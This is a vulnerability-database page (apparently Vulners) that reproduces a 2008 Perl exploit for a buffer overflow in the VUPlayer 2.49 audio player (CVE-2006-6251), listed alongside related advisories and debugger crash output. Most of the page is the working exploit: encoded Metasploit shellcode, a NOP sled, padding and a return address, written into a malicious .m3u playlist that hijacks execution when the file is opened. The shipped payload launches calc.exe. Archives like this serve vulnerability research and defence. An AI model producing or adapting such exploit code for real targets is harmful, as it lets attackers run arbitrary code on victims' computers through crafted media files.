Vulners
Lucene search
VUPlayer 2.49 M3U Playlist File Remote Buffer Overflow Exploit
🗓️ 18 Aug 2008 00:00:00Reported by Greg Linares & Expanders in version 2.44 (2006)Exploit coded by Gjoko KrsticType 
zeroscience🔗 www.zeroscience.mk👁 80 Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2006-6251 | 4 Dec 200611:28 | – | attackerkb |
 | CVE-2006-6251 | 11 Nov 201000:00 | – | circl |
 | CVE-2006-6251 | 4 Dec 200611:00 | – | cve |
 | CVE-2006-6251 | 4 Dec 200611:00 | – | cvelist |
 | VUPlayer - '.m3u' Local Buffer Overflow (Metasploit) | 11 Nov 201000:00 | – | exploitdb |
 | VUPlayer M3U Buffer Overflow | 16 Oct 200917:02 | – | metasploit |
 | CVE-2006-6251 | 4 Dec 200611:28 | – | nvd |
 | vuplayer_bof.pl.txt | 18 Aug 200800:00 | – | packetstorm |
| VUPlayer M3U Buffer Overflow | 26 Nov 200900:00 | – | packetstorm |
 | VUPlayer malformed playlist buffer overflow | 6 Sep 200700:00 | – | cert |
10
<html><body><p>#!/usr/bin/perl
#
# Title: VUPlayer 2.49 M3U Playlist File Remote Buffer Overflow Exploit
#
# Summary: VUPlayer is a freeware multi-format audio player for Windows
#
# Product web page: http://www.vuplayer.com/vuplayer.php
#
# Desc: VUPlayer 2.49 suffers from buffer overflow vulnerability that can be
# exploited remotely using user intereaction or crafting. It fails to perform
# adequate boundry condition of the user input file (1016 bytes), allowing us
# to overwrite the EIP, ECX and EBP registers. Successful exploitation executes
# calc.exe, failed attempt resolve in DoS.
#
#
# ---------------------------------WinDbg-------------------------------------
#
# (e7c.c40): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000001 ecx=41414141 edx=00da5c98 esi=0050b460 edi=0012ee24
# eip=41414141 esp=0012eab8 ebp=41414141 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
# 41414141 ?? ???
#
# ----------------------------------------------------------------------------
#
#
# Tested on Microsoft Windows XP Professional SP2 (English)
#
# Vulnerability discovered by Greg Linares & Expanders in version 2.44 (2006)
#
# Refs:
#
# - cVE: CVE-2006-6251
# - MILW0RM:2872
# - MILW0RM:2870
# - CERT-VN:VU#311192
# - BID:21363
# - FRSIRT:ADV-2006-4783
# - SECUNIA:23182
# - XF:vuplayer-plsm3u-bo(30629)
#
# Exploit coded by Gjoko 'LiquidWorm' Krstic
#
# liquidworm [t00t] gmail.com
#
# http://www.zeroscience.org
#
# 18.08.2008
#
print "\n\n";
print "=" x 80;
print "\n\n";
print "\tVUPlayer 2.49 M3U Playlist File Remote Buffer Overflow Exploit\n";
print "\t\t by LiquidWorm <liquidworm gmail.com="">\n\n\n";
print "=" x 80;
# win32_exec - EXITFUNC=thread CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
$SHELLCODE = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff".
"\x4f\x49\x49\x49\x49\x49\x49\x51\x5a\x56".
"\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30".
"\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43".
"\x56\x58\x32\x42\x44\x42\x48\x34\x41\x32".
"\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42".
"\x30\x41\x44\x41\x56\x58\x34\x5a\x38\x42".
"\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x30\x42\x30\x42\x50\x4b\x48\x45\x34".
"\x4e\x43\x4b\x58\x4e\x57\x45\x30\x4a\x57".
"\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31".
"\x4b\x58\x4f\x45\x42\x52\x41\x30\x4b\x4e".
"\x49\x54\x4b\x48\x46\x53\x4b\x38\x41\x30".
"\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a".
"\x46\x38\x42\x4c\x46\x37\x47\x50\x41\x4c".
"\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x45\x46\x32\x46\x50".
"\x45\x57\x45\x4e\x4b\x38\x4f\x55\x46\x52".
"\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x30".
"\x4b\x54\x4b\x58\x4f\x55\x4e\x51\x41\x50".
"\x4b\x4e\x4b\x38\x4e\x51\x4b\x38\x41\x30".
"\x4b\x4e\x49\x38\x4e\x35\x46\x52\x46\x30".
"\x43\x4c\x41\x33\x42\x4c\x46\x36\x4b\x38".
"\x42\x54\x42\x53\x45\x58\x42\x4c\x4a\x37".
"\x4e\x50\x4b\x58\x42\x34\x4e\x30\x4b\x58".
"\x42\x47\x4e\x31\x4d\x4a\x4b\x48\x4a\x36".
"\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x38".
"\x42\x4b\x42\x50\x42\x50\x42\x30\x4b\x38".
"\x4a\x36\x4e\x53\x4f\x55\x41\x53\x48\x4f".
"\x42\x46\x48\x35\x49\x48\x4a\x4f\x43\x38".
"\x42\x4c\x4b\x57\x42\x35\x4a\x36\x4f\x4e".
"\x50\x4c\x42\x4e\x42\x56\x4a\x56\x4a\x39".
"\x50\x4f\x4c\x48\x50\x50\x47\x35\x4f\x4f".
"\x47\x4e\x43\x36\x41\x56\x4e\x36\x43\x36".
"\x50\x32\x45\x36\x4a\x57\x45\x46\x42\x50".
"\x5a";
$FILE = "TETOVIRANJE.m3u";
$GARBAGE = "\x4A" x 461;
$NOPSLED = "\x90" x 200;
$RET = "\xC0\xE6\x12\x00";
print "\n\n[-] Buffering malicious playlist file. Please wait...\r\n";
sleep (5);
open (BOF, ">./$FILE") || die "\nCan't open $FILE: $!";
print BOF "$NOPSLED" . "$SHELLCODE" . "$GARBAGE" . "$RET";
close (BOF);
print "\n\n[+] File $FILE successfully created!\n\n";
system (pause);</liquidworm></p></body></html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Aug 2008 00:00Current
6Medium risk
Vulners AI Score6
CVSS 27.5
EPSS0.78545